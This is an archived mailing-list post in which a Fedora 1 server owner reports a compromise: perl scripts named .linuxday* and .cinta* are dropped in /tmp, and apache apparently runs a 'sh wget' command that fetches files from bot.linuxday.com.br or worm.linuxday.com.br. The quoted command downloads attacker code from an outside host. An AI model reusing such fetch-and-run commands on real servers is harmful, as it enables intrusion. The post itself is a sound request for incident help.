Server compromissed

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Apparently someone has hacked into my webserver.  And is installing perl
scripts into he /tmp/ directory.  There usually named .linuxday* or
.cinta* and a few other names as well.

>From what I can tell something is causing apache to run a command like "sh
wget  bot.linuxday.com.br -O {the above mentioned files are than listed}"

sometimes the site is worm.linuxday.com.br

I'm curious if anyone has heard about this before.  I'm currently running
Fedora 1  with all the latests security patches.



[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux